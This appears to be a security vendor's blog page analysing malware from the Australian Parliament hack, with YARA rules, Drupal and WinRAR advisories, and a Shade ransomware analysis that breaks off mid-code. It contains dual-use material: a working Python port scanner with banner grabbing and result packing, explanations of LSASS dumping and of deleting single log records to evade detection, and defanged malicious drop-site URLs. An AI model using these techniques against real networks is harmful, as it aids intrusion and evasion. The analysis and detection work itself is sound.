The Arsenal Behind the Australian Parliament Hack

Introduction

In recent days, a widely reported cyber attack targeted a high-profile target in the APAC area: the Australian Parliament House. As stated by the Australian Prime Minister, there was no evidence of information theft and the attack was promptly isolated and contained by the Australian Cyber Security Centre (ACSC); however, the attackers gained access to the networks of the ruling Liberal and National coalition parties as well as of the opposition Labor Party, just a few months before the federal election. The first technical insights point to sophisticated state-sponsored threat actors operating in the Pacific region, but no official statement has been published and the speculation that China was behind the attack is not confirmed in any way.

Alongside the public disclosure of the incident, the ACSC declassified some of the samples involved in the parliament hack, so the Cybaze-Yoroi ZLab team decided to investigate these artifacts to gain insight into the tools and capabilities of part of this APT cyber arsenal.

Technical analysis

All the analyzed files appear to be related to a post-exploitation phase, where the attacker leveraged them to conduct data exfiltration and lateral movement. None of the modules belongs to an open-source post-exploitation framework such as Metasploit or Empire; they appear to have been written from scratch in the high-level language C# on top of the .NET Framework.

The LazyCat DLL

The first analyzed sample is already known in the InfoSec community. The malware is named LazyCat and is apparently derived from the well-known Mimikatz pentest tool.

Hash (SHA256): 1c113dce265e4d744245a7c55dadc80199ae972a9e0ecbd0c5ced57067cf755b
Threat: LazyCat
Description: LazyCat DLL to perform local privilege escalation
Ssdeep: 1536:kxnT6jqsSwI1ChVKt5QtkJBDbFw+IPpUuOE7qBp69bfeL:kxCpSz1CyIGrbgKuNS69bA

Table 1: Information about the LazyCat sample.

A first static analysis shows the library is written in .NET with no heavy obfuscation, and is therefore easily decompiled into a source-code-like representation.

Figure 1: Static info about LazyCat sample.
Figure 2: Part of malware’s code.

An interesting function spotted in the code reveals its capability to inspect and gather the contents of an arbitrary process memory through the MiniDumpWriteDump function of the DbgHelp library. The function's result is stored in a newly created file whose name is taken from the “Output” string parameter (Figure 3). This is the same primitive commonly used to dump the LSASS process for offline credential extraction, so a non-debugger process opening a handle to lsass.exe with PROCESS_VM_READ access and writing a minidump is a signal worth alerting on.

Figure 3: DumpMemory function.

Moreover, the malware is able to start a “TcpRelay” service, probably with the intent of creating a route between the attacker's network and the victim's one, making lateral movement easier.

Figure 4: StartTcpRelay function.

Exploring the source code, a particular module named “RottenPotato” emerges. It contains some interesting functions, such as “findNTLMBytes” and “HandleMessageAuth”, related to the post-exploitation phase in Windows environments. A quick search shows it is an open-source tool publicly available on GitHub at https://github.com/foxglovesec/RottenPotato. RottenPotato is a local privilege escalation technique: it coaxes a SYSTEM service into performing NTLM authentication against a listener controlled by the attacker, relays that authentication to a local RPC endpoint and impersonates the resulting token, which requires the SeImpersonatePrivilege typically held by service accounts (hence the “local privilege escalation” description in Table 1).

Figure 5: findNTLMBytes function.

A diff between the GitHub source code and the malware's shows that some functions included in the malware's RottenPotato are not present in the public source. This indicates the attacker further weaponized the code to make it more effective for the malicious goal. At the same time, the use of publicly available code and open-source tools makes precise attribution of the weapons to a particular cyber group more difficult.
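RottenPotato's findNTLMBytes works by searching the relayed traffic for the 8-byte NTLMSSP signature and then reading the message type that follows it, so that the NTLM CHALLENGE obtained from the local RPC negotiation can be swapped into the DCOM authentication. The Python below is an example added here, not code from the sample or from the RottenPotato repository: it performs the same location and decoding over a hand-constructed byte stream (the DCERPC-like framing bytes and the message bodies are made up for the demonstration; the field offsets follow MS-NLMP, with the 8-byte ServerChallenge at offset 24 of a CHALLENGE message).

```python
"""Locate NTLM messages in a captured byte stream and decode their type.

Added illustration (not the sample's code nor RottenPotato's); the stream
below is constructed by hand and is not a real capture.
"""
import struct
from typing import List, NamedTuple, Optional

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
MESSAGE_NAMES = {1: "NEGOTIATE", 2: "CHALLENGE", 3: "AUTHENTICATE"}
CHALLENGE_OFFSET = 24  # ServerChallenge field inside a CHALLENGE_MESSAGE (MS-NLMP)


class NtlmMessage(NamedTuple):
    offset: int                         # where the signature starts in the stream
    msg_type: int
    name: str
    server_challenge: Optional[bytes]   # only populated for CHALLENGE messages


def find_ntlm_messages(buf: bytes) -> List[NtlmMessage]:
    """Return every NTLMSSP message found in buf, in stream order."""
    found = []
    pos = buf.find(NTLMSSP_SIGNATURE)
    while pos != -1:
        type_at = pos + len(NTLMSSP_SIGNATURE)
        if type_at + 4 <= len(buf):
            msg_type = struct.unpack_from("<I", buf, type_at)[0]
            name = MESSAGE_NAMES.get(msg_type)
            if name is not None:        # skip stray "NTLMSSP\0" strings with a bogus type
                challenge = None
                if msg_type == 2 and pos + CHALLENGE_OFFSET + 8 <= len(buf):
                    challenge = buf[pos + CHALLENGE_OFFSET:pos + CHALLENGE_OFFSET + 8]
                found.append(NtlmMessage(pos, msg_type, name, challenge))
        pos = buf.find(NTLMSSP_SIGNATURE, pos + 1)
    return found


# --- constructed test data (not a real capture) -----------------------------

def build_negotiate() -> bytes:
    """Minimal NEGOTIATE_MESSAGE: signature, type, flags, empty domain/workstation fields."""
    return NTLMSSP_SIGNATURE + struct.pack("<I", 1) + struct.pack("<I", 0xE2088297) + b"\x00" * 16


def build_challenge(challenge: bytes) -> bytes:
    """Minimal CHALLENGE_MESSAGE: signature, type, empty TargetName fields, flags,
    the 8-byte ServerChallenge at offset 24, then 8 reserved bytes."""
    assert len(challenge) == 8
    return (NTLMSSP_SIGNATURE + struct.pack("<I", 2)
            + struct.pack("<HHI", 0, 0, 0)        # TargetNameLen, MaxLen, BufferOffset
            + struct.pack("<I", 0xE28A8215)       # NegotiateFlags
            + challenge + b"\x00" * 8)


def build_authenticate() -> bytes:
    """Header of an AUTHENTICATE_MESSAGE; the payload is irrelevant for locating it."""
    return NTLMSSP_SIGNATURE + struct.pack("<I", 3) + b"\x00" * 60


SAMPLE_CHALLENGE = bytes.fromhex("1122334455667788")
# DCERPC-looking stream with the three NTLM messages embedded between opaque bytes,
# plus one decoy signature carrying an invalid message type.
SAMPLE_STREAM = (b"\x05\x00\x0b\x03\x10\x00\x00\x00" + build_negotiate()
                 + b"\x05\x00\x0c\x03" + build_challenge(SAMPLE_CHALLENGE)
                 + b"NTLMSSP\x00\xff\xff\xff\xff"
                 + b"\x05\x00\x00\x03" + build_authenticate())


def summarize(buf: bytes) -> List[str]:
    """Human-readable view, e.g. 'CHALLENGE @0x2c challenge=1122334455667788'."""
    out = []
    for m in find_ntlm_messages(buf):
        line = f"{m.name} @0x{m.offset:x}"
        if m.server_challenge is not None:
            line += f" challenge={m.server_challenge.hex()}"
        out.append(line)
    return out


if __name__ == "__main__":
    for line in summarize(SAMPLE_STREAM):
        print(line)
```

Run on a real capture, the same loop will happily report the CHALLENGE an attacker is about to relay; the decoy in the sample shows why the message type has to be validated rather than matching the signature alone.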

The LazyCat sample also has a specific module dedicated to covering tracks, named “LogEraser”.

Figure 6: LazyCat.LogEraser module.

The main function of the module is “RemoveETWLog”, whose purpose is to delete the ETW (Event Tracing for Windows) log records related to the malicious actions the attacker has performed.

Figure 7: Code to delete Windows log events.

As shown in the figure above, the malware scans all the records of the Windows event log and, if a record ID matches the given ID, that record is deleted. Selective deletion of individual records, rather than wholesale clearing, avoids the conspicuous “audit log was cleared” event (1102 in the Security log, 104 in the System log) that defenders typically alert on, so detection has to rely on other signals, such as holes in the otherwise contiguous EventRecordID sequence.
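A defender-side check for the behaviour just described, added here as an example (not code from the page or the samples): normal log retention only discards the oldest records, so EventRecordIDs between the lowest and highest retained record should be contiguous, and an interior hole indicates a record removed by something other than the Event Log service. The records below are constructed for the demonstration; on a live host the same fields come from Get-WinEvent or an exported EVTX.

```python
"""Spot selective event-record deletion and wholesale log clearing.

Added example, not code from the page's samples. The event records below are
constructed for the demonstration and are not real Windows logs.
"""
from typing import Dict, Iterable, List

# Events Windows writes when an entire log is cleared.
LOG_CLEARED_EVENTS = {("Security", 1102), ("System", 104)}

SAMPLE_RECORDS = [
    {"channel": "Security", "record_id": 1001, "event_id": 4624, "subject": "alice"},
    {"channel": "Security", "record_id": 1002, "event_id": 4688, "subject": "alice"},
    {"channel": "Security", "record_id": 1003, "event_id": 4672, "subject": "alice"},
    # record 1004 is missing: removed in place, as LazyCat's LogEraser does
    {"channel": "Security", "record_id": 1005, "event_id": 4634, "subject": "alice"},
    {"channel": "System", "record_id": 77, "event_id": 7036, "subject": "SYSTEM"},
    {"channel": "System", "record_id": 78, "event_id": 104, "subject": "alice"},
    {"channel": "Application", "record_id": 5, "event_id": 1000, "subject": "bob"},
    {"channel": "Application", "record_id": 6, "event_id": 1001, "subject": "bob"},
]


def find_record_gaps(records: Iterable[dict]) -> Dict[str, List[int]]:
    """Per channel, the EventRecordIDs missing from the interior of the sequence."""
    seen: Dict[str, set] = {}
    for r in records:
        seen.setdefault(r["channel"], set()).add(r["record_id"])
    gaps = {}
    for channel, ids in seen.items():
        missing = [i for i in range(min(ids), max(ids) + 1) if i not in ids]
        if missing:
            gaps[channel] = missing
    return gaps


def find_clear_events(records: Iterable[dict]) -> List[dict]:
    """Records documenting a whole log being cleared (Security 1102 / System 104)."""
    return [r for r in records if (r["channel"], r["event_id"]) in LOG_CLEARED_EVENTS]


def tampering_report(records: List[dict]) -> List[str]:
    """One finding per line, suitable for an alert body."""
    findings = []
    for channel, missing in find_record_gaps(records).items():
        findings.append(f"{channel}: {len(missing)} record(s) missing, ids {missing}")
    for r in find_clear_events(records):
        findings.append(f"{r['channel']}: log cleared (event {r['event_id']}) by {r['subject']}")
    return findings


if __name__ == "__main__":
    for line in tampering_report(SAMPLE_RECORDS):
        print(line)
```

Forwarding events to a collector as they are written defeats both tricks, since the attacker can only edit the local copy.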

At the time of analysis, the sample had a medium-low detection rate, probably due to the customization of open-source code snippets; the VirusTotal result is visible in the following figure:

Figure 8: LazyCat detection.

The Powerkatz DLL

Hash (SHA256): 08a85f5fe8714b4842180c12c4d192bd186500af01ee39825f6d5100a2019ebc
Threat: Generic
Description: powerkatz DLL
Ssdeep: 192:RPmh9ncu5qqTz3XQUOsnoGWX4L4Lzn066HVV1GfzacScaz/69ek4VUAVc:ucuqqTz3gUOsnoGWoL4Lz0661V1PcS5V

Table 2: Key information about powerkatz (sample 2).

Hash (SHA256): a95c9fe29a8ae0f618536fdf4874ede5412281e8dfb380bf1370a8d8794f787a
Threat: Generic
Description: powerkatz DLL
Ssdeep: 192:BPmh9ncu5qqTz3XQUOsnoGWX4L4Lan066HVV1GfzacScazu69ek4VUf:ecuqqTz3gUOsnoGWoL4L00661V1PcS57

Table 3: Key information about powerkatz (sample 3).

Despite the different hashes, the malicious functionality within the two DLLs is substantially the same: the attacker simply modified some strings and variable names, probably to evade AV detection. The similarity between the samples is shown in Figure 9, where the differences are minimal and do not affect the overall behavior.

Figure 9: Diff analysis between the samples.

The decompiled source code of the main class also confirms this similarity, e.g. the AsyncTask class in Figure 10. For this reason we reference a single sample in the following paragraphs.

Figure 10: Comparison between AsyncTask class of both samples.

The sample is composed of a few classes and functions, and one of them is a good starting point for the analysis: “StartNew”. As its name suggests, it starts a new asynchronous task on the victim's machine, executing the task object passed as the _app parameter. Once the task is started, the function waits for its completion in a loop of 1-second sleeps and then returns a status code to the caller. This module is probably used in conjunction with other functions, belonging to other pieces of the implant, to perform malicious actions in the background and make the whole more stealthy.

Figure 11: Source code of the StartNew function.

The name of this sample, Powerkatz, recalls a tool available on GitHub (https://github.com/digipenguin/powerkatz), but although the name is the same, the code is different. As with the previous sample, the detection rate, 28 of 70, is not high, as shown in Figure 12.

Figure 12: Samples detection rate.

The Recon Module

Hash (SHA256): b63ae455f3deaca297b616dd3356063112cfda6e6c5434c407781461ae69361f
Threat: Generic
Description: port scanner DLL
Ssdeep: 192:P4NjWnNsFM+5Ic8l5OG/i1/5gK0kbhdeODo3:P4NWnuf5Ic8l21iK0IhDS

Table 4: Key information about the port scanner sample.

Like the other samples, it is written in C#. It has two main classes named “PortScanner” and “ReconCommonFuncs”, giving a direct clue of the actions enabled by this part of the implant.

Figure 13: Sample’s classes.

Reading the first class's code, the “portScan” function contains an integer array listing a few well-known network ports, covering major local network services such as HTTP, TELNET, RDP, POP, IMAP, SSH and SQL.

Figure 14: Array containing the port numbers to scan.

For each declared port, the function performs a TCP connect scan. If a service is listening behind the port, it responds with its own banner, which is stored in a “StringBuilder” object. The malware concatenates the responses from all the scanned ports and finally writes the results to a file using the “ReconCommonFuncs” class. A full TCP handshake to every port on every target is noisy: it leaves connection logs on the scanned hosts and a fan-out of short-lived connections in network telemetry, which is a reliable signal of internal reconnaissance.

Figure 15: Code to perform port scan.
Figure 16: Usage of TcpClient C# class to perform scan.

The “ReconCommonFuncs” class, instead, provides some utility functions, such as “Append” and “GZipAndBase64”, whose names are self-explanatory: the collected output is compressed and Base64-encoded before being stored.
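The recon module's behaviour, reproduced as an added example (not the implant's code) so that the telemetry it generates can be studied on a lab host: a connect scan that reads the service banner on each open port, accumulates the results, and packs them the way the GZipAndBase64 helper name describes. The port list is an assumption that mirrors the services the page names; the fake SSH listener is started on a loopback port so that the whole thing runs offline.

```python
"""Connect scan with banner grabbing, packaged the way ReconCommonFuncs does.

Added example, not the implant's code. The port list and the fake SSH service
are constructed for the demonstration; everything runs against 127.0.0.1.
"""
import base64
import gzip
import socket
import threading
from typing import Dict, Iterable, Optional, Tuple

# Assumed port list mirroring the services named in the report (HTTP, TELNET, RDP, POP, IMAP, SSH, SQL).
COMMON_PORTS = [21, 22, 23, 25, 80, 110, 143, 443, 1433, 3306, 3389]


def grab_banner(host: str, port: int, timeout: float = 1.0) -> Optional[str]:
    """TCP connect; return the first bytes the service sends ('' if it stays quiet),
    or None when the port is closed or filtered."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as conn:
            conn.settimeout(timeout)
            try:
                data = conn.recv(256)
            except socket.timeout:
                data = b""   # open port, but a client-speaks-first protocol (HTTP, RDP)
            return data.decode("latin-1", errors="replace").strip()
    except OSError:
        return None


def port_scan(host: str, ports: Iterable[int]) -> Dict[int, str]:
    """Map each open port to its banner, like the sample's StringBuilder accumulation."""
    results = {}
    for port in ports:
        banner = grab_banner(host, port)
        if banner is not None:
            results[port] = banner
    return results


def format_report(host: str, results: Dict[int, str]) -> str:
    return "\n".join(f"{host}:{port} {banner or '<no banner>'}"
                     for port, banner in sorted(results.items()))


def gzip_and_base64(text: str) -> str:
    """The transformation the 'GZipAndBase64' helper name describes."""
    return base64.b64encode(gzip.compress(text.encode("utf-8"))).decode("ascii")


def decode_report(blob: str) -> str:
    return gzip.decompress(base64.b64decode(blob)).decode("utf-8")


# --- local stand-in for a real service ------------------------------------

def start_fake_service(banner: bytes) -> Tuple[threading.Event, int]:
    """Listen on an ephemeral loopback port and greet every client with `banner`."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    srv.settimeout(0.2)
    port = srv.getsockname()[1]
    stop = threading.Event()

    def serve() -> None:
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            except OSError:
                break
            with conn:
                conn.sendall(banner)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return stop, port


def unused_port() -> int:
    """Pick a loopback port that is currently closed."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo() -> Tuple[Dict[int, str], str]:
    """Scan one open (fake SSH) and one closed port; return results and the packed report."""
    stop, open_port = start_fake_service(b"SSH-2.0-OpenSSH_7.4\r\n")
    try:
        results = port_scan("127.0.0.1", [open_port, unused_port()])
        blob = gzip_and_base64(format_report("127.0.0.1", results))
    finally:
        stop.set()
    return results, blob


if __name__ == "__main__":
    found, packed = demo()
    print(found)
    print(decode_report(packed))
```

On the defensive side, the interesting artefact is not the banner but the pattern: one internal host completing handshakes to a fixed list of ports across many peers within seconds.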

Figure 17: Functions belonging to ReconCommonFuncs class.

The Powershell Agent

Hash (SHA256): 1087a214ebe61ded9f61de81999868f399a1105188467e4e44182c02ee264a19
Threat: Generic
Description: OfficeCommu DLL
Ssdeep: 3072:JbMNa4pc+32UhnsZFM7iCHF6aZ4oFlSAsBycrxAqSPWy3it5r2py2jYN/IroVbpm:JbWa4xmZcl9fFlSBtuZWQ6qp8DrhFJ

Table 5: Key information about the sample.

The last sample analyzed by Cybaze-Yoroi ZLab is called “OfficeCommu.dll”, a name probably chosen so that it is confused with a legitimate Office communication component found on many Windows machines.

This sample too is a sort of utility, probably used in the post-exploitation phase, whose purpose is to create a “PowershellAgent”, a stager component of the implant able to parse and execute PowerShell commands.

Figure 18: PowershellAgent’s main function.

Conclusion

The analyzed samples show that the attackers chose a multi-modular approach for the development of their cyber arsenal, building a complex implant on an ecosystem of libraries, each providing the functionality needed to conduct advanced offensive operations.

Although these functions and libraries do not appear to contain any zero-day exploit or novel technique, the detection of these modules within a high-value perimeter such as the Australian Parliament gives an important indication of this threat actor's arsenal development strategy: the abuse and customization of open-source pentest tools and proofs of concept is one of the preferred ways the attackers build their arsenal, possibly because it lowers the “time-to-market” and the resources required, without reducing its effectiveness or dangerousness.

It also shows how these supposedly “known” techniques and tools can easily be repackaged into evasive and silent implants capable of bypassing traditional security boundaries.

Indicators of Compromise

Hashes

1c113dce265e4d744245a7c55dadc80199ae972a9e0ecbd0c5ced57067cf755b
08a85f5fe8714b4842180c12c4d192bd186500af01ee39825f6d5100a2019ebc
a95c9fe29a8ae0f618536fdf4874ede5412281e8dfb380bf1370a8d8794f787a
b63ae455f3deaca297b616dd3356063112cfda6e6c5434c407781461ae69361f
1087a214ebe61ded9f61de81999868f399a1105188467e4e44182c02ee264a19

Yara Rules

import "pe"

rule LazyCat_22_02_2019 {

    meta:
        description = "Yara Rule for LazyCat"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2019_02_22"
        tlp = "white"
        category = "informational"

    strings:
        $a = "LazyCat"
        $b = {48 74 74 70 53 65 72 76 65 72 4C 6F}   // "HttpServerLo"
        $c = {0A 58 73 9E 00 00 0A 2A 0F 00 28 B0}
        $d = {80 A1 4E CD 13 56 80 9F}

    condition:
        pe.number_of_sections == 3 and pe.machine == pe.MACHINE_I386 and (($b and $c and $d) or ($a))
}

import "pe"

rule Powerkatz_22_02_2019 {

    meta:
        description = "Yara Rule for Powerkatz"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2019_02_22"
        tlp = "white"
        category = "informational"

    strings:
        $a1 = {C7 E8 3F}
        $b1 = {7C 43 3D}
        $a2 = {A4 58 24 8A 3A 36 8D 4B 89 15 15 33 CE 1D 1D F2}
        $b2 = {A9 B5 2D 2A 00 47 AC 44 97 7A F5 D0 04 09 75 13}

    condition:
        pe.number_of_sections == 3 and pe.machine == pe.MACHINE_I386 and (($a1 or $b1) and ($a2 or $b2))
}

import "pe"

rule Office_Commu_22_02_2019 {

    meta:
        description = "Yara Rule for Office_Commu"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2019_02_22"
        tlp = "white"
        category = "informational"

    strings:
        $a = {61 E0 4B A1 1D C6 2F A7}
        $b = {8F D2 A9 E3 70 5A B4 D9 92 1D BA}
        $c = "Kill"
        $d = {DB 71 F5 4C B0 29 27 20 B8}
        $e = "get_IsAlive"

    condition:
        pe.number_of_sections == 3 and all of them
}

import "pe"

rule eba_sample_22_02_2019 {

    meta:
        description = "Yara Rule for 1eba_sample"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2019_02_22"
        tlp = "white"
        category = "informational"

    strings:
        $a = {4A 02 73 29 00 00 0A 7D}
        $b = {F8 01 7A 00 1B 00 54 28}
        $c = "portScan"
        $d = {C9 45 99 B9 AA AD C7 46}
        $e = "parseHost"

    condition:
        pe.number_of_sections == 3 and all of them
}

This blog post was authored by Davide Testa, Antonio Farina and Luca Mella of Cybaze-Yoroi Z-LAB

Critical Vulnerability in Drupal Platforms

Proto: N060219.

Yoroi wishes to inform you about a dangerous vulnerability recently discovered in the popular Content Management System Drupal, one of the three most widely used CMS solutions worldwide, powering tens of thousands of web portals. The flaw is tracked as CVE-2019-6340.

Due to flaws in the deserialization of user-supplied parameters within the RESTful API module, which is used to build integrations and modern applications and is enabled in many installations of the CMS, a remote attacker able to interact with it through GET, PATCH or POST requests can execute arbitrary code on the victim system, compromising it without any authentication.

The vendor recently raised the risk level associated with the issue because technical details and tools to reproduce it have been released, a circumstance that makes exploitation by botnets and attackers of all kinds likely, as already seen in the Drupalgeddon and Drupalgeddon2 cases.

The security bulletin SA-CORE-2019-003 also released the security updates that fix the issue for the following Drupal versions:

Drupal 8 releases older than 8.5 received no update because their support period has ended, and Drupal 7 received no core update (there the exposure lies in contributed web-services modules); however, to mitigate the risk of compromise, Yoroi recommends updating any third-party modules that use the Drupal RESTful API, filtering REST GET/PUT/PATCH/POST requests where they are not used, and considering the replacement of obsolete Drupal portals.

Finally, Yoroi recommends keeping user awareness high by periodically warning users about ongoing threats, and relying on a team of experts to safeguard the security of the “cyber” perimeter. For a real-time threat index, visit the following link: Yoroi Cyber Security Index


Critical Vulnerabilities in WinRAR

Proto: N050219.

Yoroi wishes to inform you about a recent series of vulnerabilities discovered in the WinRAR archive manager, whose popularity over the years has made it one of the main archiving tools in professional environments as well. The flaws are tracked as CVE-2018-20250, CVE-2018-20251, CVE-2018-20252 and CVE-2018-20253.

The issues stem from improper input handling in the “unacev2.dll” library, dating back to 2005 and shipped as part of WinRAR, where security researchers found multiple ways to abuse the extraction of ACE-format archives. These findings enable attack scenarios for remote threat actors who, through Watering-Hole or Spear-Phishing techniques, may be able to:

The vendor confirmed the issue for all recent WinRAR versions, releasing update 5.70 beta 1, which drops ACE support altogether since the affected library's source code is no longer available.

Although no in-the-wild attacks using these vulnerabilities have been observed so far, the availability of technical details sufficient to reproduce the issues is a non-negligible factor, so Yoroi suggests considering blocking “ACE” archives within your perimeter where they are not commonly used for business purposes. Note that WinRAR identifies the format by content, so an ACE archive renamed with a .rar extension is still opened by the vulnerable library; a block based on file extension alone is not enough.

Finally, Yoroi recommends keeping user awareness high by periodically warning users about ongoing threats, and relying on a team of experts to safeguard the security of the “cyber” perimeter. For a real-time threat index, visit the following link: Yoroi Cyber Security Index

Wave of Attacks Using Encrypted Archives

Proto: N040219.

Yoroi wishes to inform you about a dangerous attack campaign under way in these days against Italian organizations. The attacks are characterized by the abuse of genuine email conversations previously exchanged between the victims and the sender addresses of the infected emails. This modus operandi had already been observed during several waves of Ursnif attack campaigns in 2018, reported in the Early Warning bulletins N010518, N040318, N040618 and N040718.

This new wave of fraudulent messages is further characterized by password-protected compressed attachments containing malicious documents able to start the Ursnif infection chain on the victim host. This stratagem represents a security risk because a gateway cannot inspect the content of an archive whose password travels only in the message body, so the malicious messages have a higher chance of evading the perimeter controls to which incoming mail is subjected.
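Two of the checks recommended in these bulletins, blocking ACE archives regardless of the extension they carry (the WinRAR advisory above) and spotting password-protected archives that a gateway cannot open (this Ursnif wave), can both be made on attachment content. The Python below is an example added here, not Yoroi's tooling: the message and the archive bytes are constructed for the demonstration, and the "encrypted" ZIP is merely flagged as encrypted (bit 0 of the general-purpose flags, which is what a gateway sees) rather than actually encrypted. ACE archives carry the signature "**ACE**" at offset 7 of the main header.

```python
"""Flag ACE archives and password-protected ZIPs among e-mail attachments by content.

Added example (not Yoroi's code); the message and attachment bytes are constructed.
"""
import email
import email.policy
import io
import zipfile
from email.message import EmailMessage
from typing import List, Tuple

ACE_MAGIC = b"**ACE**"   # present at offset 7 of every ACE main header
ACE_MAGIC_OFFSET = 7
RAR_MAGIC = b"Rar!\x1a\x07"
ZIP_MAGIC = b"PK\x03\x04"
ZIP_FLAG_ENCRYPTED = 0x0001


def is_ace_archive(data: bytes) -> bool:
    end = ACE_MAGIC_OFFSET + len(ACE_MAGIC)
    return len(data) >= end and data[ACE_MAGIC_OFFSET:end] == ACE_MAGIC


def is_encrypted_zip(data: bytes) -> bool:
    """True if any entry has the encryption bit set; the directory is readable without a password."""
    if not data.startswith(ZIP_MAGIC):
        return False
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return any(info.flag_bits & ZIP_FLAG_ENCRYPTED for info in zf.infolist())
    except zipfile.BadZipFile:
        return False


def sniff(data: bytes) -> str:
    """Classify by content, ignoring the declared filename."""
    if is_ace_archive(data):
        return "ace-archive"
    if is_encrypted_zip(data):
        return "encrypted-zip"
    if data.startswith(ZIP_MAGIC):
        return "zip"
    if data.startswith(RAR_MAGIC):
        return "rar"
    return "other"


def inspect_attachments(raw_message: bytes) -> List[Tuple[str, str]]:
    """(filename, verdict) for every attachment of an RFC 822 message."""
    msg = email.message_from_bytes(raw_message, policy=email.policy.default)
    verdicts = []
    for part in msg.iter_attachments():
        payload = part.get_payload(decode=True) or b""
        verdicts.append((part.get_filename() or "", sniff(payload)))
    return verdicts


def suspicious_attachments(raw_message: bytes) -> List[Tuple[str, str]]:
    return [v for v in inspect_attachments(raw_message) if v[1] in ("ace-archive", "encrypted-zip")]


# --- constructed test data ---------------------------------------------------

# ACE main-header prefix: CRC16 (2), header size (2), header type (1), flags (2), signature.
FAKE_ACE = b"\x5c\xd1\x31\x00\x00\x00\x90" + ACE_MAGIC + b"\x00" * 40
FAKE_RAR = RAR_MAGIC + b"\x00" * 41


def build_zip(name: str, content: bytes) -> bytes:
    bio = io.BytesIO()
    with zipfile.ZipFile(bio, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name, content)
    return bio.getvalue()


def flag_zip_entries_encrypted(data: bytes) -> bytes:
    """Test-data helper: set bit 0 of the flags in every local header (offset 6)
    and central-directory entry (offset 8). Content is not really encrypted."""
    buf = bytearray(data)
    for magic, flag_off in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
        pos = buf.find(magic)
        while pos != -1:
            buf[pos + flag_off] |= ZIP_FLAG_ENCRYPTED
            pos = buf.find(magic, pos + 1)
    return bytes(buf)


def build_sample_message() -> bytes:
    msg = EmailMessage()
    msg["From"] = "sender@example.test"
    msg["To"] = "victim@example.test"
    msg["Subject"] = "Re: ordine"
    msg.set_content("see attached")
    msg.add_attachment(FAKE_RAR, maintype="application", subtype="octet-stream", filename="report.rar")
    msg.add_attachment(FAKE_ACE, maintype="application", subtype="octet-stream", filename="invoice.rar")
    msg.add_attachment(build_zip("photos.txt", b"plain"), maintype="application", subtype="zip", filename="photos.zip")
    msg.add_attachment(flag_zip_entries_encrypted(build_zip("ordine.doc", b"lure")),
                       maintype="application", subtype="zip", filename="ordine.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, verdict in inspect_attachments(build_sample_message()):
        print(f"{name}: {verdict}")
```

The point of sniffing rather than trusting the name is visible in the sample: "invoice.rar" is an ACE archive and would reach the vulnerable unacev2.dll untouched by an extension filter.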

The indicators of compromise identified during the analysis are reported below:


Figure. Example of message content

Finally, Yoroi recommends keeping user awareness high by periodically warning users about ongoing threats, and relying on a team of experts to safeguard the security of the “cyber” perimeter. For a real-time threat index, visit the following link: Yoroi Cyber Security Index

The Long Run of Shade Ransomware

Introduction

Between January and February, a new, intense ransomware campaign was observed by many security firms. It spreads Shade/Troldesh variants, one of the most dangerous threats in the cybercrime scene, known since its massive infections in Russia back in 2015; its expansion has been tracked by several CSIRTs and CERTs all around the world. As stated in a recent ESET report, Shade infections increased during October 2018, kept a constant trend until the second half of December 2018, took a break around Christmas, and then resumed in mid-January 2019 at double the size (shown in Figure 1).

Figure 1. Trend of malicious JavaScript downloading Shade ransomware (source: ESET).

The latest attack waves were quite interesting because the criminals tried to impersonate Russian oil and gas companies, in particular “PAO NGK Slavneft”, probably to hit a portion of that industry segment. Cybaze-Yoroi ZLab analyzed some recent samples spreading during the last week.

Technical analysis

The chosen infection vector is email, usual and effective. The phishing email carries a .zip file named “slavneft.zakaz.zip”, which means roughly “slavneft order” in English, a direct reference to “Slavneft”. It contains a JavaScript file with a Russian name, “«ПАО «НГК «Славнефть» подробности заказа”, which again translates to “PAO NGK Slavneft order details”.

Figure 2. References to an Oil-Gas company

This file acts as the downloader in the infection chain, using a series of hard-coded server addresses. It relies heavily on obfuscation and encryption to avoid anti-malware detection.

Figure 3. JavaScript decryption routine

A few rounds of debugging and decryption reveal its inner, cleartext code:

Figure 4. Main of the JS script.

The figure above highlights some interesting details: if the first HTTP request fails, the second one is not sent; the variable “qF” is merely initialized with the other malicious URL. The payload is executed several times only if the first server could be reached.

The JavaScript is probably still under development, and the attacker may add further code to retrieve the sample from other sources.

All the resources loaded by the JavaScript downloader point to compromised websites, mostly running the WordPress and Joomla CMSs. According to other firms, Troldesh can leverage a “worm” module designed to search for and brute-force the login pages of several known CMS applications, such as WordPress and Joomla; an odd coincidence.

Once inside a website, it uploads a copy of the executable: with this approach the malware keeps creating backup copies, increasing its resilience to takedowns. However, the sample delivered in the latest intercepted campaign is not configured to use this feature.
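The claim that the drop sites are mostly WordPress and Joomla installations can be checked directly from the defanged URL list in the IoC section. The Python below is an example added here (not the page's code): it re-fangs the indicators, groups them by host, infers the CMS from well-known path prefixes and counts payload names. The sample input is a subset of this report's own IoC list; the path markers used to guess the CMS are an assumption for triage, not a fingerprinting standard.

```python
"""Triage a defanged drop-URL list: re-fang, group by host, infer the CMS from the path.

Added example (not the page's code). SAMPLE_IOCS is a subset of the report's IoC list;
the CMS path markers are heuristics assumed for triage.
"""
from collections import Counter
from typing import Dict, List
from urllib.parse import urlsplit

SAMPLE_IOCS = [
    "hxxp://equiracing[.]fr/templates/rhuk_milkyway_equiracing/css/messg[.]jpg",
    "hxxp://usep75[.]fr/wp-content/themes/usep75-2011_/js/messg[.]jpg",
    "hxxp://senital[.]co[.]uk/templates/a4joomla-ocean-free/js/messg[.]jpg",
    "hxxp://service.baynuri[.]net/.well-known/acme-challenge/messg[.]jpg",
    "hxxps://sobornarada.gov[.]ua/templates/soborna/css/slavneft.zakaz.zip",
    "hxxps://sobornarada.gov[.]ua/templates/soborna/css/messg[.]jpg",
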